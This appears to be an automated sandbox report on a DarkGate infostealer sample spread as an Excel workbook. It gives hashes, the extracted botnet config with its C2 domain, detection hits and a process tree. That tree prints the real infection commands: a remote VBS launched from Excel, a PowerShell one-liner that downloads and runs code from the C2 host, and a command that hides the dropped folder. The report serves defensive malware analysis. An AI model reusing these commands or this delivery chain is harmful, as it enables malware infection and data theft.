darkgate | 0aae59e8b36fe2bbeb75e177702f3f44682b333fd6c751d355c1e796691fdd8c

Analysis

max time kernel
105s
max time network
110s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
19-03-2024 17:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

march19-D7621-2024.xlsx
Size

56KB
MD5

78a0e98eb82f8101e07ee8e1217935e1
SHA1

0dadb2a6df70848c840c2858b96f4ebead0356fe
SHA256

0aae59e8b36fe2bbeb75e177702f3f44682b333fd6c751d355c1e796691fdd8c
SHA512

8949b2aad7eeb68f0d32f5f60bb95c9c4bbb6312d279f3ebd4d862e7c9dea02721d18776cb955d6f5d52cfbe16644a5a231203f4749a8bdc355058bce925a191
SSDEEP

1536:Fkws9oLE3Ow6DyPgMUti9xx7bxNfI5ydaRLgIui3pqDyBROnlTQ:FSoEOfEgMNdxI5yYhgu5zBRYc

Score

10^/10

darkgate admin888 stealer

Malware Config

Extracted

Family

darkgate

Botnet

admin888

badbutperfect.com

Attributes

anti_analysis
true
anti_debug
false
anti_vm
true
c2_port
80
check_disk
false
check_ram
false
check_xeon
false
crypter_au3
false
crypter_dll
false
crypter_raw_stub
false
internal_mutex
WZqqpfdY
minimum_disk
50
minimum_ram
4000
ping_interval
6
rootkit
false
startup_persistence
true
username
admin888

Signatures

DarkGate
DarkGate is an infostealer written in C++.
stealer darkgate

Detect DarkGate stealer 2 IoCs

resource	yara_rule
behavioral2/memory/4916-66-0x00000000031A0000-0x0000000003213000-memory.dmp	family_darkgate_v6
behavioral2/memory/4916-68-0x00000000031A0000-0x0000000003213000-memory.dmp	family_darkgate_v6

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4084	3512	WScript.exe	86
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	5552	3512	WScript.exe	86

Blocklisted process makes network request 6 IoCs

flow	pid	Process
58	2484	powershell.exe
60	2484	powershell.exe
80	2484	powershell.exe
83	2484	powershell.exe
164	5616	powershell.exe
167	5616	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 1 IoCs

pid	Process
4916	AutoHotkey.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 5 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AutoHotkey.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	AutoHotkey.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
3512	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
2484	powershell.exe
2484	powershell.exe
2484	powershell.exe
4600	msedge.exe
4600	msedge.exe
4028	msedge.exe
4028	msedge.exe
5336	identity_helper.exe
5336	identity_helper.exe
5616	powershell.exe
5616	powershell.exe
5616	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
4028	msedge.exe
4028	msedge.exe
4028	msedge.exe
4028	msedge.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2484	powershell.exe
Token: SeDebugPrivilege	5616	powershell.exe

Suspicious use of FindShellTrayWindow 26 IoCs

pid	Process
4028	msedge.exe
4028	msedge.exe
4028	msedge.exe
4028	msedge.exe
4028	msedge.exe
4028	msedge.exe
4028	msedge.exe
4028	msedge.exe
4028	msedge.exe
4028	msedge.exe
4028	msedge.exe
4028	msedge.exe
4028	msedge.exe
4028	msedge.exe
4028	msedge.exe
4028	msedge.exe
4028	msedge.exe
4028	msedge.exe
4028	msedge.exe
4028	msedge.exe
4028	msedge.exe
4028	msedge.exe
4028	msedge.exe
4028	msedge.exe
4028	msedge.exe
4028	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
4028	msedge.exe
4028	msedge.exe
4028	msedge.exe
4028	msedge.exe
4028	msedge.exe
4028	msedge.exe
4028	msedge.exe
4028	msedge.exe
4028	msedge.exe
4028	msedge.exe
4028	msedge.exe
4028	msedge.exe
4028	msedge.exe
4028	msedge.exe
4028	msedge.exe
4028	msedge.exe
4028	msedge.exe
4028	msedge.exe
4028	msedge.exe
4028	msedge.exe
4028	msedge.exe
4028	msedge.exe
4028	msedge.exe
4028	msedge.exe

Suspicious use of SetWindowsHookEx 21 IoCs

pid	Process
3512	EXCEL.EXE
3512	EXCEL.EXE
3512	EXCEL.EXE
3512	EXCEL.EXE
3512	EXCEL.EXE
3512	EXCEL.EXE
3512	EXCEL.EXE
3512	EXCEL.EXE
3512	EXCEL.EXE
3512	EXCEL.EXE
3512	EXCEL.EXE
3512	EXCEL.EXE
3512	EXCEL.EXE
3512	EXCEL.EXE
3512	EXCEL.EXE
3512	EXCEL.EXE
3512	EXCEL.EXE
3512	EXCEL.EXE
3512	EXCEL.EXE
3512	EXCEL.EXE
3512	EXCEL.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3512 wrote to memory of 4084	3512	EXCEL.EXE	100
PID 3512 wrote to memory of 4084	3512	EXCEL.EXE	100
PID 4084 wrote to memory of 2484	4084	WScript.exe	101
PID 4084 wrote to memory of 2484	4084	WScript.exe	101
PID 2484 wrote to memory of 4916	2484	powershell.exe	105
PID 2484 wrote to memory of 4916	2484	powershell.exe	105
PID 2484 wrote to memory of 4916	2484	powershell.exe	105
PID 2484 wrote to memory of 5080	2484	powershell.exe	106
PID 2484 wrote to memory of 5080	2484	powershell.exe	106
PID 4028 wrote to memory of 3900	4028	msedge.exe	109
PID 4028 wrote to memory of 3900	4028	msedge.exe	109
PID 4028 wrote to memory of 4320	4028	msedge.exe	110
PID 4028 wrote to memory of 4320	4028	msedge.exe	110
PID 4028 wrote to memory of 4320	4028	msedge.exe	110
PID 4028 wrote to memory of 4320	4028	msedge.exe	110
PID 4028 wrote to memory of 4320	4028	msedge.exe	110
PID 4028 wrote to memory of 4320	4028	msedge.exe	110
PID 4028 wrote to memory of 4320	4028	msedge.exe	110
PID 4028 wrote to memory of 4320	4028	msedge.exe	110
PID 4028 wrote to memory of 4320	4028	msedge.exe	110
PID 4028 wrote to memory of 4320	4028	msedge.exe	110
PID 4028 wrote to memory of 4320	4028	msedge.exe	110
PID 4028 wrote to memory of 4320	4028	msedge.exe	110
PID 4028 wrote to memory of 4320	4028	msedge.exe	110
PID 4028 wrote to memory of 4320	4028	msedge.exe	110
PID 4028 wrote to memory of 4320	4028	msedge.exe	110
PID 4028 wrote to memory of 4320	4028	msedge.exe	110
PID 4028 wrote to memory of 4320	4028	msedge.exe	110
PID 4028 wrote to memory of 4320	4028	msedge.exe	110
PID 4028 wrote to memory of 4320	4028	msedge.exe	110
PID 4028 wrote to memory of 4320	4028	msedge.exe	110
PID 4028 wrote to memory of 4320	4028	msedge.exe	110
PID 4028 wrote to memory of 4320	4028	msedge.exe	110
PID 4028 wrote to memory of 4320	4028	msedge.exe	110
PID 4028 wrote to memory of 4320	4028	msedge.exe	110
PID 4028 wrote to memory of 4320	4028	msedge.exe	110
PID 4028 wrote to memory of 4320	4028	msedge.exe	110
PID 4028 wrote to memory of 4320	4028	msedge.exe	110
PID 4028 wrote to memory of 4320	4028	msedge.exe	110
PID 4028 wrote to memory of 4320	4028	msedge.exe	110
PID 4028 wrote to memory of 4320	4028	msedge.exe	110
PID 4028 wrote to memory of 4320	4028	msedge.exe	110
PID 4028 wrote to memory of 4320	4028	msedge.exe	110
PID 4028 wrote to memory of 4320	4028	msedge.exe	110
PID 4028 wrote to memory of 4320	4028	msedge.exe	110
PID 4028 wrote to memory of 4320	4028	msedge.exe	110
PID 4028 wrote to memory of 4320	4028	msedge.exe	110
PID 4028 wrote to memory of 4320	4028	msedge.exe	110
PID 4028 wrote to memory of 4320	4028	msedge.exe	110
PID 4028 wrote to memory of 4320	4028	msedge.exe	110
PID 4028 wrote to memory of 4320	4028	msedge.exe	110
PID 4028 wrote to memory of 4600	4028	msedge.exe	111
PID 4028 wrote to memory of 4600	4028	msedge.exe	111
PID 4028 wrote to memory of 1792	4028	msedge.exe	112
PID 4028 wrote to memory of 1792	4028	msedge.exe	112
PID 4028 wrote to memory of 1792	4028	msedge.exe	112
PID 4028 wrote to memory of 1792	4028	msedge.exe	112
PID 4028 wrote to memory of 1792	4028	msedge.exe	112
PID 4028 wrote to memory of 1792	4028	msedge.exe	112
PID 4028 wrote to memory of 1792	4028	msedge.exe	112
PID 4028 wrote to memory of 1792	4028	msedge.exe	112
PID 4028 wrote to memory of 1792	4028	msedge.exe	112
PID 4028 wrote to memory of 1792	4028	msedge.exe	112
PID 4028 wrote to memory of 1792	4028	msedge.exe	112

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
5080	attrib.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\march19-D7621-2024.xlsx"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3512
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "\\escuelademarina.com\cloud\AZURE_DOC_OPEN.vbs"
  2⤵
  - Process spawned unexpected child process
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:4084
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri 'badbutperfect.com/nrwncpwo')
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2484
  - - C:\rimz\AutoHotkey.exe
      "C:\rimz\AutoHotkey.exe" script.ahk
      4⤵
      Executes dropped EXE
      Checks processor information in registry
      PID:4916
  - - C:\Windows\system32\attrib.exe
      "C:\Windows\system32\attrib.exe" +h C:/rimz
      4⤵
      Views/modifies file attributes
      PID:5080
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "\\escuelademarina.com\cloud\AZURE_DOC_OPEN.vbs"
  2⤵
  - Process spawned unexpected child process
  - Checks computer location settings
  PID:5552
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri 'badbutperfect.com/nrwncpwo')
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5616

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4028
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffe86bc46f8,0x7ffe86bc4708,0x7ffe86bc4718
  2⤵
  PID:3900
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2204,10692986792320241595,9864927424713550060,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2236 /prefetch:2
  2⤵
  PID:4320
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2204,10692986792320241595,9864927424713550060,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2256 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4600
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2204,10692986792320241595,9864927424713550060,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2808 /prefetch:8
  2⤵
  PID:1792
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,10692986792320241595,9864927424713550060,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3448 /prefetch:1
  2⤵
  PID:1596
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,10692986792320241595,9864927424713550060,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3472 /prefetch:1
  2⤵
  PID:3792
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,10692986792320241595,9864927424713550060,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5000 /prefetch:1
  2⤵
  PID:1440
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,10692986792320241595,9864927424713550060,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4308 /prefetch:1
  2⤵
  PID:2412
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2204,10692986792320241595,9864927424713550060,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4400 /prefetch:8
  2⤵
  PID:5320
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2204,10692986792320241595,9864927424713550060,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4400 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5336

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4692

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2232

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A

Filesize
471B

MD5
4fce0e2d81c9038247f9c4b9dc125ce2

SHA1
85d341283aa0201fcdb629c730e2d704704a9a24

SHA256
5f434114781e29972cb6e66c8587e4f2dc1428221730120ff1005a90cd08cc23

SHA512
5dde6f23ee0c793c2c9f5cfafd5a01c978707e23945adfc7686c555c52d3ca1ff571d413c6cd779b73620048cb229d8f4fa14af76206c11582ba9e477b5113c9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A

Filesize
412B

MD5
5433cc1f0256c833b2faa56d29a93b1e

SHA1
1eac7697e884f53e6a1749d3d0cd25fd37df9c0b

SHA256
e5cde2803dbff762d882a87d43819c093f68e46b1baca1dca0b0a8931a27faea

SHA512
8afbbbf7d00a6033a821f46fc6ab8797153989573abde5011c38ed82c312bb3bfa4f1d4515139869da7cfef6bee09526492019bd8453d4839d37f3eedaa63457

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
56c43715e0e7fa58012d8a5769d8d568

SHA1
4370ca3436f2e3a95b47a728503a2c22a5a5fa39

SHA256
8ef51b68725d9ddcda70f9f7ef24686ff3cb4a00f7d2dce79d10027ed63dfed5

SHA512
b8da8defb2080d04babc3e676cc9686c7f71b15eeca0e738ca75c9fb7af968eba8d3daff5bc2e31d471e26568df2f319ec1f4b00bf43ffb60460e5df787947ed

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
279e783b0129b64a8529800a88fbf1ee

SHA1
204c62ec8cef8467e5729cad52adae293178744f

SHA256
3619c3b82a8cbdce37bfd88b66d4fdfcd728a1112b05eb26998bea527d187932

SHA512
32730d9124dd28c196bd4abcfd6a283a04553f3f6b050c057264bc883783d30d6602781137762e66e1f90847724d0e994bddf6e729de11a809f263f139023d3b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
cbec32729772aa6c576e97df4fef48f5

SHA1
6ec173d5313f27ba1e46ad66c7bbe7c0a9767dba

SHA256
d34331aa91a21e127bbe68f55c4c1898c429d9d43545c3253d317ffb105aa24e

SHA512
425b3638fed70da3bc16bba8b9878de528aca98669203f39473b931f487a614d3f66073b8c3d9bc2211e152b4bbdeceb2777001467954eec491f862912f3c7a0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
274c4f228255b74726415bed82c04264

SHA1
ad10a26c1503a5c4842d14a59c958601cf139bec

SHA256
fd6399d1b9895d20759b691a5ea8dc4237c5e60d744e01fbbb805f1a735702ba

SHA512
5eedab9b7a6f6ad571c068dd51f9ce6f6fa40b16356d3017d1d4e53634a7521c4f7b3a8cfddbe0973a9d7913079c0c36665c94c94722ed41492a8316e36d3084

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
b507130b79171d8eb230aa7f780bce33

SHA1
33581906649301dce9d12b062d8517dec8367bb8

SHA256
84f91ba54d79631fab67ee76e1416dee012028965127cc89494af6e00f1d8703

SHA512
f6e1087f97afdd031d98dddea9052a2c9cb08fa443a1ebe06bdb4bc6c19e36f5470ade40fc565002e8cf40999ecf4d98354892dd3e5279496e66758e0739a462

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
05ccc3e5463b35491c1952c201d30b45

SHA1
c6e0156be953936126e7b7e72f688a7a08d8b29f

SHA256
9444cf9bde7d5b801495e5ff6bc217e4c4910c38ee51c62f132ac98e7187ffbe

SHA512
6f50ffce64711b2f5c724cd1fbb1482717e6d95a8c055eba4d867c08eeceef39ac25cf7eac0850079531188a232ea72fe2a1290c547bf8a5a822f8ded2360b98

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres

Filesize
2KB

MD5
9792d8a938765d7d37fee5549eade05a

SHA1
75a3f6a527ef183b0a79875fe932f11ad6ba144d

SHA256
2d84a415549dd9926a06c264b4bc3504b97ba2c7683d021bb72fa387cff2f47f

SHA512
99028d55eb9001f0eb048ba1ac20d512aa7ec5a4ceed08340f2aafee6ed4cc1a58c1253976acc08692f1c008a8c8fc01e95be6f3fa95566f63bc37552e9a884f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\49dbe2955480c7f6ef8cec9c4320c9868d9293fd.tbres

Filesize
2KB

MD5
0b9a3b950879a1ad23f4a5f080b8ec5e

SHA1
7a313e1123828e56df86a4f05b9b1f815744ccdf

SHA256
7a2452e8c47819bc88fb85c21d0fc68d675694f4e42beb047b3cf0c5cf627143

SHA512
1e845b257277feaa67e46935ee04e3c003422de05e43dffdbdc106d042deece2afc8c7e0f23467714af6d2a9800f4a2ca9abc303037625d18c5f2570a630eac5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ec3435c9e543fe59402b0a9c3e33c71b

SHA1
1f0ca923c1508118699d9a3e9efb492e76008175

SHA256
1060e6728cd7e3d02cff59a1d0a524ee1af3f666d044fad871cbdd5a4ce29d99

SHA512
8789c79186e7c2ace02f08cbf93cfd1184497d195b4841d6b2485c3d238b206643617ac8ad803e7dc58362b0c002ee842ba607742c5bc4e43104b67d2d8b09c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zysw4i43.fuy.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\rimz\AutoHotkey.exe

Filesize
892KB

MD5
a59a2d3e5dda7aca6ec879263aa42fd3

SHA1
312d496ec90eb30d5319307d47bfef602b6b8c6c

SHA256
897b0d0e64cf87ac7086241c86f757f3c94d6826f949a1f0fec9c40892c0cecb

SHA512
852972ca4d7f9141ea56d3498388c61610492d36ea7d7af1b36d192d7e04dd6d9bc5830e0dcb0a5f8f55350d4d8aaac2869477686b03f998affbac6321a22030

Download Submit
C:\rimz\AutoHotkey.exe

Filesize
448KB

MD5
0ed70f462878d54e59aa6f313e73f10d

SHA1
db5f8bfe6252fda247eb0d2f020b4973d4462980

SHA256
d1bcdf574d0e6b3823b5bc93ae5ea9c4bc55717d72678a13637c7f6e2ab31179

SHA512
8e6bfeb3a4fd355219e8fd5dfd6844f286299ae4c6bf886ec8211da0a253cca002bfd55411548663101a13cf8032244ed79d03986776d7259f0ebbf9b6a07d78

Download Submit
C:\rimz\script.ahk

Filesize
54KB

MD5
f02f0bba1f1f678da41abafd02f4c545

SHA1
c40b80bc4947d4ac52bc9c17d6d218b1fa9cd452

SHA256
5aac7d31149048763e688878c3910ae4881826db80e078754f5d08f2c1f39572

SHA512
8b56e388781a9fb855d8352f2cf175a7e0c5bb36bacd79be719ffa0c9f4c9f6e852bd460b6e9b0b7ea47ff38aa803e43a2366bf7a2686905c05bdd9e231b5b22

Download Submit
C:\rimz\test.txt

Filesize
915KB

MD5
4e1b052f107d2ee5321b44fc0e107638

SHA1
679e1f8006a2d6ed61f0dbaf5e9d3cd252421cd4

SHA256
a39dba6db04a85050ba7949881769f4b006b4a8edf691a605bfa5fe7c24d3489

SHA512
5c4d1907ef2cbc894e8e33d268160a88e9db2d1a081676cba9d8fcfda4c120458a2ed90d44b2963accc842b03fac9bf231145d5991899bf6ab4871d9b65c2cb1

Download Submit
memory/2484-46-0x00000241EBC00000-0x00000241EBC10000-memory.dmp

Filesize
64KB

Download
memory/2484-45-0x00007FFE7E480000-0x00007FFE7EF41000-memory.dmp

Filesize
10.8MB

Download
memory/2484-63-0x00007FFE7E480000-0x00007FFE7EF41000-memory.dmp

Filesize
10.8MB

Download
memory/2484-48-0x00000241EC2C0000-0x00000241EC482000-memory.dmp

Filesize
1.8MB

Download
memory/2484-40-0x00000241EBC10000-0x00000241EBC32000-memory.dmp

Filesize
136KB

Download
memory/2484-47-0x00000241EBC00000-0x00000241EBC10000-memory.dmp

Filesize
64KB

Download
memory/3512-14-0x00007FFEAADD0000-0x00007FFEAAFC5000-memory.dmp

Filesize
2.0MB

Download
memory/3512-12-0x00007FFE684F0000-0x00007FFE68500000-memory.dmp

Filesize
64KB

Download
memory/3512-19-0x00007FFEAADD0000-0x00007FFEAAFC5000-memory.dmp

Filesize
2.0MB

Download
memory/3512-34-0x00007FFEAADD0000-0x00007FFEAAFC5000-memory.dmp

Filesize
2.0MB

Download
memory/3512-18-0x00007FFEAADD0000-0x00007FFEAAFC5000-memory.dmp

Filesize
2.0MB

Download
memory/3512-17-0x00007FFEAADD0000-0x00007FFEAAFC5000-memory.dmp

Filesize
2.0MB

Download
memory/3512-33-0x00007FFEAADD0000-0x00007FFEAAFC5000-memory.dmp

Filesize
2.0MB

Download
memory/3512-16-0x00007FFE684F0000-0x00007FFE68500000-memory.dmp

Filesize
64KB

Download
memory/3512-15-0x00007FFEAADD0000-0x00007FFEAAFC5000-memory.dmp

Filesize
2.0MB

Download
memory/3512-1-0x00007FFEAADD0000-0x00007FFEAAFC5000-memory.dmp

Filesize
2.0MB

Download
